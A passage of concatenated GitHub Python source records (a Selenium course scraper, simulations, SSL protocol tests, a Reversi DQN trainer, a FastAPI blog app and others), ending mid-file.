0.2\")\n \n self.startBtn=QPushButton('Start')\n self.endBtn=QPushButton('Stop')\n \n sublayout1 = QtWidgets.QVBoxLayout()\n sublayout1.addWidget(logo, alignment=QtCore.Qt.AlignCenter)\n sublayout1.addWidget(label, alignment=QtCore.Qt.AlignCenter)\n sublayout1.addWidget(version, alignment=QtCore.Qt.AlignCenter)\n self.is_debug = QCheckBox(\"Save debug log\")\n self.is_debug.setChecked(True)\n sublayout1.addWidget(self.is_debug)\n sublayout1.addWidget(self.startBtn)\n sublayout1.addWidget(self.endBtn)\n \n grid.addLayout(sublayout1, 4, 0, 6, 1)\n grid.addWidget(logTextBox.widget,4, 1, 6, 4)\n \n self.startBtn.clicked.connect(self.start)\n self.endBtn.clicked.connect(self.end)\n \n\n \n self.setLayout(grid)\n self.setGeometry(800, 500, 800, 300)\n self.setWindowTitle('aChia Dash Monitor')\n self.setWindowIcon(QtGui.QIcon(self.note_icon)) \n self.timer=QTimer()\n self.timer.timeout.connect(self.run)\n \n self.chia_logger.config = self.config\n \n def get_value(self):\n self.config[\"TOKEN\"] = self.e1.text() \n self.config[\"MACHINE_ID\"] = self.e2.text()\n self.config[\"PLOTTING_LOGS_PATH\"] = self.e3.text()\n with open(self.file_name, 'w') as yaml_file:\n yaml.dump(self.config, yaml_file, default_flow_style=False)\n\n def run(self):\n self.chia_logger.run() \n \n def start(self):\n try:\n self.get_value()\n logging.info(\"***********Starting aChia Dash Monitor***********\")\n logging.info(f\"TOKEN = {self.config['TOKEN']}\" )\n logging.info(f\"MACHINE_ID = {self.config['MACHINE_ID']}\" )\n logging.info(f\"PLOTTING_LOGS_PATH = {self.config['PLOTTING_LOGS_PATH']}\" )\n logging.info(\"********************************************\" )\n self.is_debug.setEnabled(False)\n if self.is_debug.isChecked():\n logger_gui.setLevel(logging.DEBUG)\n logging.info(\"DEBUG is ON\" )\n else:\n logger_gui.setLevel(logging.INFO)\n logging.info(\"DEBUG is OFF\" )\n \n self.chia_logger.set_value()\n self.run() \n self.timer.start(60000)\n self.startBtn.setEnabled(False)\n self.endBtn.setEnabled(True)\n except Exception as e:\n logging.error(e)\n \n def end(self):\n logging.info(\"***********Stopped*********\" )\n self.timer.stop()\n self.startBtn.setEnabled(True)\n self.endBtn.setEnabled(False) \n self.is_debug.setEnabled(True)\n\n \n\n\n \nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n widget = MyDialog()\n widget.show()\n #widget.line_edit.setText('Text updated!')\n ret = sys.exit(app.exec_())\n sys.exit(ret)\n","repo_name":"achia-co/achia-dash","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6519,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"}
+{"seq_id":"9691561781","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\n\nchrome = webdriver.Chrome()\nchrome.implicitly_wait(10)\nchrome.get(\"http://study.foton.com.cn\")\nchrome.maximize_window()\ncategory_list = ['领导力学院', '工程学院', '制造学院', '营销学院', '金融学院', '其他专业课程', '国际学院', '通用类', '精品微课',\n '计划类(面授)课程', '主题学习', '生产管��学院', '事业部专有课程', '研发管理学院', '市场运营学院', '财务管理学院',\n '销售管理学院', '人力资源学院', '职业化学院', '领导力学院', '综合管理学院', '个人发展学院']\n\n\ndef login():\n account = input('请输入用户名:')\n password = input('请输入密码:')\n\n ele = chrome.find_element_by_id(\"loginName\")\n ele.click()\n ele.send_keys(account)\n\n ele = chrome.find_element_by_id(\"password\")\n ele.click()\n ele.send_keys(password)\n\n time.sleep(1)\n ele = chrome.find_element_by_css_selector(\"#fm1 > input.btn.btn-block.btn-primary.btn-lg\")\n ele.click()\n\n\ndef find_courses_data():\n with open('course_data.txt', 'w', encoding='utf-8') as f:\n f.write('课程名称,')\n f.write('课程ID,')\n f.write('课程学分,')\n f.write('结业条件\\n')\n chrome.switch_to.frame(chrome.find_element_by_xpath('/html/body/div[2]/div[4]/div[2]/iframe'))\n time.sleep(3)\n # above = chrome.find_element_by_partial_link_text(\"学习中心\")\n study_center = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, '学习中心')))\n time.sleep(1)\n ActionChains(chrome).move_to_element(study_center).perform()\n time.sleep(2)\n # above = chrome.find_element_by_link_text(\"课程中心\")\n course_center = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, '课程中心')))\n course_center.click()\n chrome.switch_to.default_content()\n time.sleep(2)\n chrome.switch_to.frame(chrome.find_element_by_id('tbc_window_iframe_19'))\n time.sleep(2)\n for category in category_list:\n # ele = chrome.find_element_by_partial_link_text(category)\n ele = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, category)))\n ele.click()\n time.sleep(2)\n try:\n last_page = int(chrome.find_element_by_class_name('pagnum-last').text)\n except:\n last_page = 1\n for i in range(1, last_page+1):\n cp = 1\n # ele = chrome.find_element_by_id('categoryFilterResult')\n time.sleep(1)\n ele = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.ID, 'categoryFilterResult'))\n )\n # ul = ele.find_element_by_tag_name('ul')\n ul = WebDriverWait(ele, 15, 0.5).until(\n EC.presence_of_element_located((By.TAG_NAME, 'ul'))\n )\n # li_list = ul.find_elements_by_tag_name('li')\n li_list = WebDriverWait(ul, 15, 0.5).until(\n EC.presence_of_all_elements_located((By.TAG_NAME, 'li'))\n )\n for li in li_list:\n time.sleep(0.2)\n # div = li.find_element_by_class_name('list-p')\n div = WebDriverWait(li, 15, 0.5).until(\n EC.presence_of_element_located((By.CLASS_NAME, 'list-p')))\n # h3 = div.find_element_by_tag_name('h3')\n h3 = WebDriverWait(div, 15, 0.5).until(\n EC.presence_of_element_located((By.TAG_NAME, 'h3')))\n course_name = h3.text\n f.write(course_name + ',')\n course_id = h3.get_attribute('data-id')\n f.write(course_id + ',')\n detial_list = div.find_elements_by_class_name('learndetail')\n detial_credit = detial_list[0]\n # 这里的credit是str类型\n credit = detial_credit.find_elements_by_tag_name('span')[1].find_element_by_tag_name('em').text\n f.write(credit)\n f.write(',')\n completion = div.find_element_by_class_name('coursebrief').find_element_by_tag_name('em').text\n f.write(completion + '\\n')\n if last_page > 1:\n if cp < last_page:\n # next_page = chrome.find_element_by_class_name('pag-next-page')\n next_page = WebDriverWait(chrome, 30, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, '下一页')))\n next_page.click()\n cp += 1\n time.sleep(3)\n\n\nif __name__ == \"__main__\":\n login()\n find_courses_data()\n chrome.quit()\n\n\n\n\n","repo_name":"Idealisten/OneClickToLearnFotonUniversityOnlineStudyPlatform","sub_path":"GetAllCourseData.py","file_name":"GetAllCourseData.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"26601972307","text":"# currently set to nsims = 250 and dirlimit = 25; reset to 2500 and 250 for production runs\n\nimport os\nfrom math import ceil\nfrom string import ascii_lowercase as letters\n\nimport numpy as np\nimport pandas as pd\nimport InterruptionAnalysis as ia\nimport Independent as sim\n\nnp.random.seed(12345)\n\n# import reference data and convert time step to 1/10th second\ndata = pd.read_csv('./data/timeseries.csv', index_col = 0)\nnumeric_cols = ['begin', 'end', 'dur', 'lat']\nfor col in numeric_cols:\n data[col] = data[col]/100\n\n# keep only those agents analyzed in the DHVg analysis: those with |x| >= 20\nsample = list(data.groupby(\"pID\")[\"dur\"].count().loc[lambda x: x >= 20].index)\n\n# estimate /p/ and /q/ for each r_i and collect it into a data frame indexed by pID with columns \"p\" and \"q\"\nrows = {}\nfor pID in sample:\n P_i = ia.get_transition_matrix(data, pID)\n p = P_i[0, 1]\n q = P_i[1, 0]\n rows[pID] = [p, q]\nP = pd.DataFrame.from_dict(rows, orient = \"index\", columns = [\"p\", \"q\"])\n\n# sim parameters for all sims\nnsims = 250\n\n####\n## Timer Code\n## prints to stdout the time it takes to simulate one reference individual nsims times\n## does not save any data\n# import time\n# time1 = time.time()\n# pID = np.random.choice(sample)\n# row = P[P.index.isin([pID])]\n# P_i = np.array([[1 - row[\"p\"], row[\"p\"]], [row[\"q\"], 1 - row[\"q\"]]])\n# gID = pID[:3]\n# T = round(data[data[\"gID\"] == gID][\"end\"].max())\n# # these two are the same for all in this file, but would change otherwise\n# N = 1\n# ns = list(range(N))\n# for run in range(nsims):\n# Y = sim.simulation(P_i, T, N, ns, oneagent = True)\n# X = ia.Y_to_X(Y, ns)\n# time2 = time.time()\n# print(time2 - time1)\n## end timer code\n####\n\n# prepare subdirectory structure\n# separate sims into subdirectories to speed file lookup\nsavepath = \"./data/simulations/mimic-agents\"\nif not os.path.isdir(savepath):\n os.mkdir(savepath)\ndirlimit = 25\nnsubdirs = ceil(nsims/dirlimit)\n\n# main loop\nfor pID in sample:\n print(pID)\n # select reference individual and associated transition matrix\n row = P[P.index.isin([pID])]\n P_i = np.array([[1 - row[\"p\"], row[\"p\"]], [row[\"q\"], 1 - row[\"q\"]]])\n \n # set sim parameters for this sim\n gID = pID[:3]\n T = round(data[data[\"gID\"] == gID][\"end\"].max())\n # these two are the same for all in this file, but would change otherwise\n N = 1\n ns = list(range(N))\n\n # prepare subdirectories for this pID\n pidpath = savepath + f\"/{pID}\"\n if not os.path.isdir(pidpath):\n os.mkdir(pidpath)\n for i in range(nsubdirs):\n subpath = f\"{pidpath}/{letters[i]}\"\n if not os.path.isdir(subpath):\n os.mkdir(subpath)\n\n # run the sims\n pointer = 0\n subdir = letters[pointer]\n for run in range(nsims):\n if run > 0 and run % dirlimit == 0:\n pointer += 1\n subdir = letters[pointer]\n Y = sim.simulation(P_i, T, N, ns, oneagent = True)\n X = ia.Y_to_X(Y, ns)\n # and store them in the appropriate place\n X.to_csv(f\"{pidpath}/{subdir}/{pID}-{run}.csv\")\n\n","repo_name":"ngmaclaren/interruption-abm","sub_path":"generate-mimic-agents.py","file_name":"generate-mimic-agents.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1431386758","text":"\"\"\"Urls for feedgrabber categories\"\"\"\nfrom django.conf.urls.defaults import *\n\nfrom feedgrabber.models import Category\n\ncategory_conf = {'queryset': Category.objects.all()}\n\nurlpatterns = patterns('django.views.generic.list_detail',\n url(r'^$', 'object_list',\n category_conf, 'feedgrabber_category_list'),\n )\n\nurlpatterns += patterns('feedgrabber.views.categories',\n url(r'^(?P[-\\w]+)/$', 'view_category_detail',\n name='feedgrabber_category_detail'),\n )\n","repo_name":"Fantomas42/django-feedgrabber","sub_path":"feedgrabber/urls/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"16"}
+{"seq_id":"2844467872","text":"import RPi.GPIO as GPIO\nfrom time import sleep\nfrom socketIO_client import SocketIO, BaseNamespace\nfrom config import CLIENT_HOST, PORT, RPiConfig\n\nsio = SocketIO(CLIENT_HOST, PORT)\nispace = sio.define(BaseNamespace, '/input')\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\n\ntry:\n GPIO.setup([RPiConfig.LEFT_BUTTON_PIN, RPiConfig.RIGHT_BUTTON_PIN], GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.setup([RPiConfig.LEFT_DIOD_PIN, RPiConfig.RIGHT_DIOD_PIN], GPIO.OUT, initial = GPIO.LOW)\n while True:\n if GPIO.input(RPiConfig.LEFT_BUTTON_PIN):\n GPIO.output(RPiConfig.LEFT_DIOD_PIN, GPIO.HIGH)\n ispace.emit('button pressed', {'data': '1'})\n sleep(RPiConfig.DIOD_TIMEOUT)\n GPIO.output(RPiConfig.LEFT_DIOD_PIN, GPIO.LOW)\n if GPIO.input(RPiConfig.RIGHT_BUTTON_PIN):\n GPIO.output(RPiConfig.RIGHT_DIOD_PIN, GPIO.HIGH)\n ispace.emit('button pressed', {'data': '2'})\n sleep(RPiConfig.DIOD_TIMEOUT)\n GPIO.output(RPiConfig.RIGHT_DIOD_PIN, GPIO.LOW)\n sleep(0.05)\nfinally:\n GPIO.cleanup()\n","repo_name":"ivellios/familiaria","sub_path":"buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27894501167","text":"#!/usr/bin/python3\n\nimport hidden_4\n\n\ndef main():\n \"\"\"Get the names that are in the file using the dir() function.\n Go through each name to make sure that only the ones\n that do not start with '__' are stored in the names list.\n Print each name from the sorted list of names.\n Sorting will be handled with the sorted() method\n \"\"\"\n\n names = [name for name in dir(hidden_4) if not name.startswith('__')]\n\n for name in sorted(names):\n print(name)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ShawnZain/alx-higher_level_programming","sub_path":"0x02-python-import_modules/4-hidden_discovery.py","file_name":"4-hidden_discovery.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"74061969929","text":"import apprise\n\nimport logging\n\nlog = logging.getLogger('apprise')\n\n\nclass Apprise:\n NAME = \"Apprise\"\n\n def __init__(self, url, title='Cloudplow'):\n self.url = url\n self.title = title\n log.debug(\"Initialized Apprise notification agent\")\n\n def send(self, **kwargs):\n if not self.url:\n log.error(\"You must specify a URL when initializing this class\")\n return False\n\n # send notification\n try:\n apobj = apprise.Apprise()\n apobj.add(self.url)\n apobj.notify(\n title=self.title,\n body=kwargs['message'],\n )\n\n except Exception:\n log.exception(f\"Error sending notification to {self.url}\")\n return False\n","repo_name":"l3uddz/cloudplow","sub_path":"utils/notifications/apprise.py","file_name":"apprise.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":329,"dataset":"github-code","pt":"16"}
+{"seq_id":"75045815","text":"import random\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nimport time\r\n\r\nclass Reservoir:\r\n def __init__(self,k): #k개 샘플링하겠다.\r\n self.sampled = []\r\n self.k = k\r\n self.cnt =0 # 몇 번째로 들어온 아이템인지 나타내는 변수\r\n\r\n def put(self, item): #스트림에서 item 하나가 reservoir sampled로 들어옴\r\n if self.cnt < self.k: # k개 이하로 들어올 경우 : 배열에 그냥 추가\r\n self.sampled.append(item)\r\n else: # k개 이상이 들어왔을 경우 : r target:\n ed = mid - 1\n else:\n st = mid\n return nums[st]\n\ndef UptimalUtilization(a, b, target):\n a.sort(key=lambda x:x[1])\n b.sort(key=lambda x:x[1])\n len1 = len(a)\n len2 = len(b)\n curval = 0\n res = []\n for idx1, num1 in a:\n idx2, num2 = find_element(b,target-num1)\n if num1 + num2 <= target:\n print(num1+num2)\n if curval < num1 + num2:\n curval = num1 + num2\n res = [[idx1, idx2]]\n elif curval == num1 + num2:\n res.append([idx1, idx2])\n return res\n\n\na = [[1, 2], [2, 4], [3, 6]]\nb = [[1, 2]]\ntarget = 7\n#print(UptimalUtilization(a, b, target))\n\n\nprint (UptimalUtilization([(1,2000),(2,3000),(3,6000)],\n\t [(1,2000)], 7000))\n","repo_name":"SrilakshmiSripathi/Data_Structures_and_Algorithms_Practice","sub_path":"DataStructures/Assorted/airtime3.py","file_name":"airtime3.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70574112007","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport socket\n\nimport pytest\n\nfrom vdsm.common import cmdutils\nfrom vdsm.common import concurrent\nfrom vdsm.common import commands\nfrom vdsm.protocoldetector import MultiProtocolAcceptor\nfrom vdsm.sslutils import SSLContext, SSLHandshakeDispatcher\nfrom yajsonrpc.betterAsyncore import Reactor\n\nfrom integration.sslhelper import key_cert_pair # noqa: F401\n\n\n@pytest.fixture\ndef fake_gethostbyaddr(monkeypatch, request):\n entry = getattr(request, 'param', None)\n if entry is not None:\n hostname, ipaddrlist = entry\n\n def impl(addr):\n if addr not in ipaddrlist:\n raise socket.herror()\n return (hostname, [], ipaddrlist)\n\n monkeypatch.setattr('vdsm.sslutils.socket.gethostbyaddr', impl)\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr', [('example.com', ['10.0.0.1'])],\n indirect=True)\ndef test_same_string(fake_gethostbyaddr):\n assert SSLHandshakeDispatcher.compare_names('10.0.0.1', 'example.com')\n\n\n@pytest.mark.parametrize('lhs,rhs', [('::ffff:127.0.0.1', '127.0.0.1'),\n ('127.0.0.1', '::ffff:127.0.0.1')])\ndef test_mapped_address(lhs, rhs):\n assert SSLHandshakeDispatcher.compare_names(lhs, rhs)\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr', [('example.com', ['10.0.0.1'])],\n indirect=True)\ndef test_failed_mapped_address(fake_gethostbyaddr):\n assert not SSLHandshakeDispatcher.compare_names('10.0.0.1',\n '::ffff:127.0.0.1')\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr',\n [('example.com', ['10.0.0.1', '10.0.0.2'])],\n indirect=True)\ndef test_multiple(fake_gethostbyaddr):\n assert SSLHandshakeDispatcher.compare_names('10.0.0.2', 'example.com')\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr',\n [('evil.imposter.com', ['10.0.0.1'])],\n indirect=True)\ndef test_imposter(fake_gethostbyaddr):\n assert not SSLHandshakeDispatcher.compare_names('10.0.0.1', 'example.com')\n\n\n@pytest.mark.parametrize('lhs,rhs', [('127.0.0.1', 'example.com'),\n ('::1', 'example.com'),\n ('::ffff:127.0.0.1', 'example.com')])\ndef test_local_addresses(lhs, rhs):\n assert SSLHandshakeDispatcher.compare_names(lhs, rhs)\n\n\n@pytest.fixture\ndef dummy_register_protocol_detector(monkeypatch):\n monkeypatch.setattr(MultiProtocolAcceptor, '_register_protocol_detector',\n lambda d: d.close())\n\n\n@pytest.fixture # noqa: F811 # TODO: remove after upgrading flake to 3.9.2\ndef listener(dummy_register_protocol_detector, key_cert_pair, request): # noqa: F811, E501\n key_file, cert_file = key_cert_pair\n reactor = Reactor()\n\n sslctx = SSLContext(cert_file=cert_file, key_file=key_file,\n ca_certs=cert_file)\n\n acceptor = MultiProtocolAcceptor(\n reactor,\n '127.0.0.1',\n 0,\n sslctx=sslctx\n )\n\n try:\n t = concurrent.thread(reactor.process_requests)\n t.start()\n (host, port) = acceptor._acceptor.socket.getsockname()[0:2]\n yield (host, port)\n finally:\n acceptor.stop()\n reactor.stop()\n t.join()\n\n\n@pytest.fixture # noqa: F811 # TODO: remove after upgrading flake to 3.9.2\ndef client_cmd(listener, key_cert_pair): # noqa: F811\n key_file, cert_file = key_cert_pair\n\n def wrapper(protocol):\n (host, port) = listener\n cmd = ['openssl', 's_client', '-connect', '%s:%s' % (host, port),\n '-CAfile', cert_file, '-cert', cert_file, '-key', key_file,\n protocol]\n return commands.run(cmd)\n\n return wrapper\n\n\n@pytest.mark.parametrize('protocol', [\n pytest.param(\n '-ssl2',\n id='ssl2'\n ),\n pytest.param(\n '-ssl3',\n id='ssl3'\n ),\n pytest.param(\n '-tls1',\n id='tls1'\n ),\n pytest.param(\n '-tls1_1',\n id='tls1.1'\n )\n])\ndef test_tls_unsupported_protocols(client_cmd, protocol):\n with pytest.raises(cmdutils.Error):\n client_cmd(protocol)\n\n\n@pytest.mark.parametrize('protocol', [\n pytest.param(\n '-tls1_2',\n id='tls1.2'\n ),\n])\ndef test_tls_protocols(client_cmd, protocol):\n assert b\"Verify return code: 0 (ok)\" in client_cmd(protocol)\n","repo_name":"oVirt/vdsm","sub_path":"tests/ssl_test.py","file_name":"ssl_test.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"16"}
+{"seq_id":"19806580385","text":"from __future__ import absolute_import\n\n\nimport oneflow.core.operator.op_conf_pb2 as op_conf_util\nimport oneflow.core.register.logical_blob_id_pb2 as logical_blob_id_util\nimport oneflow.python.framework.interpret_util as interpret_util\nimport oneflow.python.framework.distribute as distribute_util\nimport oneflow.python.framework.id_util as id_util\nimport oneflow.python.framework.input_blob_def as input_blob_util\nimport oneflow.python.framework.remote_blob as remote_blob_util\nfrom oneflow.python.oneflow_export import oneflow_export\nfrom typing import Optional, Tuple\n\n\n@oneflow_export(\"experimental.indexed_slices_reduce_sum\")\ndef indexed_slices_reduce_sum(\n indices: input_blob_util.ArgBlobDef,\n values: input_blob_util.ArgBlobDef,\n name: Optional[str] = None,\n) -> Tuple[remote_blob_util.BlobDef]:\n op_conf = op_conf_util.OperatorConf()\n if name is None:\n op_conf.name = id_util.UniqueStr(\"IndexedSlicesReduceSum_\")\n else:\n op_conf.name = name\n\n op_conf.indexed_slices_reduce_sum_conf.x_indices = indices.unique_name\n op_conf.indexed_slices_reduce_sum_conf.x_values = values.unique_name\n op_conf.indexed_slices_reduce_sum_conf.y_indices = \"y_indices\"\n op_conf.indexed_slices_reduce_sum_conf.y_values = \"y_values\"\n op_conf.indexed_slices_reduce_sum_conf.num_unique = \"num_unique\"\n\n interpret_util.Forward(op_conf)\n y_indices_lbi = logical_blob_id_util.LogicalBlobId()\n y_indices_lbi.op_name = op_conf.name\n y_indices_lbi.blob_name = \"y_indices\"\n y_values_lbi = logical_blob_id_util.LogicalBlobId()\n y_values_lbi.op_name = op_conf.name\n y_values_lbi.blob_name = \"y_values\"\n num_unique_lbi = logical_blob_id_util.LogicalBlobId()\n num_unique_lbi.op_name = op_conf.name\n num_unique_lbi.blob_name = \"num_unique\"\n\n return (\n remote_blob_util.RemoteBlob(y_indices_lbi),\n remote_blob_util.RemoteBlob(y_values_lbi),\n remote_blob_util.RemoteBlob(num_unique_lbi),\n )\n","repo_name":"Sodu-Qinming/Oneflow","sub_path":"oneflow/python/experimental/indexed_slices_ops.py","file_name":"indexed_slices_ops.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23636562039","text":"class DiameterOfBinaryTree:\n \"\"\"\n Desc:\n # 543\n Given the root of a binary tree, return the length of the diameter of the tree.\n Link: \n https://leetcode.com/problems/diameter-of-binary-tree/\n Notes:\n \"\"\"\n\n # dfs\n # Time: O(n) - nodes in tree\n # Space: O(n)\n def diameterOfBinaryTree(self, root): \n # the diameter is the longest path b/n any two nodes\n # path is a cnt of edges\n \n res = 0\n \n # for each node get length of left and right path\n # res = max(left + right paths, res)\n \n def maxPath(n):\n if not n: return 0\n \n nonlocal res\n \n # get max paths\n left = maxPath(n.left) \n right = maxPath(n.right)\n path = 1 + max(left, right)\n \n # check diameter \n res = max(res, left + right)\n \n return path \n \n maxPath(root)\n return res\n\n\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right","repo_name":"csdatasist/lc-repo","sub_path":"others/DiameterOfBinaryTree.py","file_name":"DiameterOfBinaryTree.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27489946784","text":"import numpy as np\r\n\r\nimport argparse\r\nfrom reversi import Reversi\r\nfrom dqn_agent import DQNAgent\r\nfrom random_agent import RANDOMAgent\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-m\", \"--model_path\", help='Path ot the model files')\r\n parser.add_argument(\"-l\", \"--load\", dest=\"load\", action=\"store_true\",\r\n default=False, help='Load trained model (default: off)')\r\n parser.add_argument(\"-e\", \"--epoch-num\", dest=\"n_epochs\", default=30,\r\n type=int, help='Numpber of training epochs (default: 1000)')\r\n parser.add_argument(\"--simple\", dest=\"is_simple\", action=\"store_true\", default=True,\r\n help='Train simple model without cnn (8 x 8) (default: true)')\r\n parser.add_argument(\"-g\", \"--graves\", dest=\"graves\", action=\"store_true\",\r\n default=False, help='Use RmpropGraves (default: off)')\r\n parser.add_argument(\"-d\", \"--ddqn\", dest=\"ddqn\", action=\"store_true\",\r\n default=False, help='Use Double DQN (default: off)')\r\n parser.add_argument(\"-s\", \"--save-interval\", dest=\"save_interval\", default=15, type=int) # 1000\r\n args = parser.parse_args()\r\n\r\n # parameters\r\n n_epochs = args.n_epochs\r\n\r\n # environment, agent\r\n env = Reversi()\r\n\r\n # playerID\r\n playerID = [env.Black, env.White, env.Black]\r\n\r\n # player agent\r\n players = []\r\n # player[0] = env.Black\r\n agent = DQNAgent(env.enable_actions, env.name, color=\"black\", ddqn=args.ddqn)\r\n if args.load:\r\n agent.load_model(args.model_path)\r\n else:\r\n agent.init_model()\r\n players.append(agent)\r\n\r\n # player[1] = env.White\r\n agent = RANDOMAgent(env.enable_actions, env.name, color=\"white\")\r\n players.append(agent)\r\n\r\n # # variables\r\n wins = [0, 0]\r\n e = 0 # エポック数\r\n \r\n while e < n_epochs:\r\n # reset\r\n env.reset()\r\n\r\n state_ts = [None, None]\r\n action_ts = [None, None]\r\n state_t_1s = [None, None]\r\n reward_ts = [None, None]\r\n terminals = [None, None]\r\n \r\n while not env.isEnd():\r\n\r\n # 次の手番の人をゲットする\r\n # ゲームが終わっていない以上、BlackかWhiteしか出ない\r\n next_player_color = env.get_next_player()\r\n idx = 0 if next_player_color == env.Black else 1 if next_player_color == env.White else None # Noneだとプログラムおかしい\r\n\r\n # observe environment\r\n state_t_1s[idx], reward_ts[idx], terminals[idx] = env.observe(next_player_color)\r\n\r\n # 1時刻前の結果をstoreにpushしておく\r\n # 本来はenv.execute_action(action_ts[col], playerID[col])の後に、env.observe()とstore_experienceを実行したいが、\r\n # 相手番との兼ね合いがあるので、また自分の手番になった際に代入するようにしている\r\n if action_ts[idx] != None:\r\n players[idx].store_experience([state_ts[idx]], action_ts[idx], reward_ts[idx], [state_t_1s[idx]], terminals[idx])\r\n\r\n # 着手する盤面をstate_tに代入\r\n state_ts[idx] = state_t_1s[idx] \r\n # 行動を選択\r\n action_ts[idx] = players[idx].select_action([state_ts[idx]], players[idx].exploration)\r\n # 実際に環境に対してアクションを起こす\r\n env.execute_action(action_ts[idx], playerID[idx])\r\n\r\n # whileを抜けたということはゲームが終わったということ\r\n # 最後のstore_experienceを代入する\r\n for i, color in enumerate([env.Black, env.White]):\r\n state_t_1s[i], reward_ts[i], terminals[i] = env.observe(color)\r\n players[i].store_experience([state_ts[i]], action_ts[i], reward_ts[i], [state_t_1s[i]], terminals[i])\r\n\r\n if reward_ts[i] == 1:\r\n wins[i] += 1\r\n \r\n # 1試合終わったら学習を開始する ⇒ N試合終わったら学習を開始するに変更する\r\n\r\n # εの値を小さくする\r\n players[0].update_exploration(e)\r\n players[1].update_exploration(e)\r\n\r\n # 学習\r\n players[0].experience_replay(e)\r\n players[1].experience_replay(e)\r\n\r\n # 10試合でtarget_modelもupdateする\r\n if e % 10:\r\n players[0].update_target_model\r\n players[1].update_target_model\r\n players[0].reset_experience()\r\n players[1].reset_experience()\r\n\r\n print(f\"EPOCH: {e:03d}/{n_epochs - 1:03d} | BLACK_WIN: {wins[0]:03d} | WHITE_WIN: {wins[1]:03d}\")\r\n if e > 0 and e % args.save_interval == 0:\r\n players[0].save_model(e)\r\n players[0].save_model()\r\n players[1].save_model(e)\r\n players[1].save_model()\r\n e += 1\r\n\r\n # save model\r\n players[0].save_model()\r\n players[1].save_model()\r\n","repo_name":"youseegreen/reversi_keras_dqn","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"34754001259","text":"from fastapi import FastAPI, Depends, status, Response, HTTPException\r\nimport models, schemas\r\nfrom database import engine, SessionLocal\r\nfrom sqlalchemy.orm import Session\r\n\r\napp = FastAPI()\r\n\r\nmodels.Base.metadata.create_all(bind=engine)\r\n\r\ndef get_db():\r\n\tdb = SessionLocal()\r\n\ttry:\r\n\t\tyield db\r\n\tfinally:\r\n\t\tdb.close()\r\n\r\n# Create a Blog\r\n\r\n@app.post('/blogs', status_code=status.HTTP_201_CREATED) #status_code=201 also works\r\ndef create(blog:schemas.Blog, db:Session = Depends(get_db)):\r\n\tnew_blog = models.Blog(title=blog.title, body=blog.body)\r\n\tdb.add(new_blog)\r\n\tdb.commit()\r\n\tdb.refresh(new_blog)\r\n\treturn new_blog\r\n\r\n# Delete a Blog\r\n\r\n@app.delete('/blogs/{id}', status_code=status.HTTP_204_NO_CONTENT)\r\ndef destroy(id:int, db:Session=Depends(get_db)):\r\n\tblog = db.query(models.Blog).filter(models.Blog.id == id)\r\n\tif not blog.first():\r\n\t\traise HTTPException(status_code=status.HTTP_404_NOT_FOUND, \r\n\t\t\t\t\t\t\tdetail=f'Blog {id} not found.')\r\n\tblog.delete(synchronize_session=False)\r\n\tdb.commit()\r\n\treturn {'detail':f'Blog {id} has been deleted.'}\r\n\r\n# Update a Blog\r\n\r\n@app.put('/blog/{id}', status_code=status.HTTP_202_ACCEPTED)\r\ndef update(id:int, blog:schemas.Blog, db:Session = Depends(get_db)):\r\n\tblog_ = db.query(models.Blog).filter(models.Blog.id == id)\r\n\tif not blog_.first():\r\n\t\traise HTTPException(status_code=status.HTTP_404_NOT_FOUND, 